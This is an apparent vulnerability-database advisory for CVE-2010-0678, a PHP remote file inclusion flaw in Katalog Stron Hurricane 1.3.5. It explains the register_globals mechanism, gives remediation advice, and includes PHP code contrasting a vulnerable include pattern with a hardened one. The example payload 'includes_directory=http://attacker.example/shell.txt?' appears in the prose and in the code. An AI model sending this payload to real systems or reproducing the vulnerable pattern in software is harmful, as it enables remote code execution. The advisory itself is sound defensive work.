CVE-2010-0678 in Katalog Stron Hurricane

Summary

by MITRE

PHP remote file inclusion vulnerability in includes/moderation.php in Katalog Stron Hurricane 1.3.5, and possibly earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the includes_directory parameter.


Analysis

by VulDB Data Team • 05/01/2026

CVE-2010-0678 is a remote file inclusion (RFI) flaw in Katalog Stron Hurricane 1.3.5, and possibly earlier releases. The affected script is includes/moderation.php, which builds an include path from the variable includes_directory without validating it. The flaw is only reachable when the PHP directive register_globals is enabled: that setting automatically turns every HTTP request variable (GET, POST, cookie) into a global PHP variable, so a script that never initialises a variable itself can have it set by the client. This was a common attack vector in older PHP applications.

Exploitation follows the classic RFI pattern. The attacker sends a request in which the includes_directory parameter carries a URL pointing at a server under their control, for example includes_directory=http://attacker.example/shell.txt?. With register_globals on, PHP defines $includes_directory from that parameter before the script runs; because moderation.php uses the variable as the prefix of an include path without checking it, the include statement is handed a URL instead of a local directory. If the PHP configuration also allows URL wrappers in include statements (allow_url_include in PHP 5.2 and later, allow_url_fopen before that), the interpreter fetches the remote file and executes its contents as PHP code in the web server's context, bypassing the application's access controls entirely. The trailing question mark is a common trick: it turns whatever filename the script appends into a query string so the remote URL still resolves. VulDB classifies the entry under CWE-88 (argument injection) and CWE-94 (code injection); the most specific CWE for this defect is CWE-98, Improper Control of Filename for Include/Require Statement in PHP Program (PHP remote file inclusion), which is a child of CWE-94.

The operational impact goes beyond the initial code execution: the injected code runs as the web server user, which gives the attacker read access to the application's configuration and database credentials, a foothold for dropping a web shell or other backdoor for persistent access, and a starting point for local privilege escalation or lateral movement. Exposure is limited to deployments that still run with register_globals enabled; the directive was deprecated in PHP 5.3.0 and removed entirely in PHP 5.4.0, so installations on a current PHP runtime cannot be exploited through this path even if the application code is unchanged.

Remediation starts with the runtime configuration: set register_globals = Off in php.ini (or upgrade to PHP 5.4 or later, where the directive no longer exists), and set allow_url_include = Off so that include and require cannot load code through URL wrappers even if another parameter is later found to be controllable. Those two settings remove the exploit path on their own. At the application level, the correct fix is not to sanitise the URL but to stop deriving include paths from request data at all: initialise includes_directory to a fixed server-side value, and where a user-chosen component is unavoidable, restrict it to an allowlist of known names and confine the resolved path with realpath() to the intended directory. Generic filters such as filter_var() are not sufficient on their own, since a valid-looking local path can still point outside the intended directory. Upgrade to a fixed release if the vendor provides one. A web application firewall rule that rejects includes_directory values containing a scheme (http://, https://, ftp://, php://, data:) and monitoring of access logs for such requests provide defence in depth and detection. In ATT&CK terms the attack corresponds to T1190 (Exploit Public-Facing Application) for initial access and T1059 (Command and Scripting Interpreter) for execution of the injected code.
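The two paragraphs above describe the mechanism and the fix in prose; the following is an added illustration in PHP and is not the Katalog Stron Hurricane source (the actual contents of includes/moderation.php are not reproduced on this page). Only the variable name includes_directory comes from the advisory; the function names, the module names in the allowlist, the INCLUDES_DIRECTORY constant and the attacker URL are assumptions made for the example. Because register_globals no longer exists in current PHP, the vulnerable function uses extract() to reproduce the same effect, so the example runs on PHP 7 or later.

```php
<?php
// Added example, not the project's code. Shows why register_globals plus an
// uninitialised include prefix gives remote file inclusion, and one hardened form.
//
// php.ini settings that close the exploit path regardless of application code:
//   register_globals  = Off   (removed entirely in PHP 5.4)
//   allow_url_include = Off   (allow_url_fopen = Off before PHP 5.2)

// --- Vulnerable pattern ----------------------------------------------------
// With register_globals=On, the request
//   GET /includes/moderation.php?includes_directory=http://attacker.example/shell.txt?
// defines $includes_directory before the script's own code runs. extract() on the
// request array emulates that behaviour here.
function vulnerable_include_path(array $request): string
{
    extract($request);                       // emulates register_globals
    // Script never assigned $includes_directory itself, so the attacker's value
    // becomes the prefix. With URL wrappers allowed in include statements, PHP
    // would fetch and execute the remote file at this path.
    return $includes_directory . '/moderation_functions.php';
}

// --- Hardened pattern ------------------------------------------------------
// 1. The include directory is a server-side constant, never request data.
// 2. Any user-chosen component is allowlisted, and the resolved path is confined
//    with realpath() so wrappers (http://, php://, data:) and traversal (../)
//    cannot escape the directory.
define('INCLUDES_DIRECTORY', __DIR__ . '/includes');   // assumed location

function safe_include_path(string $module): string
{
    $allowed = ['moderation_functions', 'helpers'];    // assumed module names
    if (!in_array($module, $allowed, true)) {
        throw new InvalidArgumentException('unknown module: ' . $module);
    }
    $base = realpath(INCLUDES_DIRECTORY);
    $path = realpath(INCLUDES_DIRECTORY . '/' . $module . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('include path escapes ' . INCLUDES_DIRECTORY);
    }
    return $path;
}

// Demonstration on a constructed attacker request. The trailing '?' turns the
// filename the script appends into a query string, so the URL still resolves.
$attack = ['includes_directory' => 'http://attacker.example/shell.txt?'];
echo "vulnerable: ", vulnerable_include_path($attack), "\n";

try {
    echo "hardened:   ", safe_include_path($attack['includes_directory']), "\n";
} catch (InvalidArgumentException $e) {
    echo "hardened:   rejected (", $e->getMessage(), ")\n";
}
```

Run it with `php rfi_example.php`. The vulnerable function returns the attacker's URL with the script's filename appended, which is exactly the string an include statement would receive; the hardened function rejects the same value at the allowlist before any path is resolved. Note that the allowlist check alone is not enough in general, which is why the realpath() confinement stays in place for the allowed names.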

Reservation

02/22/2010

Disclosure

02/22/2010

Moderation

accepted

Entry

VDB-51932

CPE

ready

Exploit

Download

EPSS

0.01823

KEV

no

Activities

very low
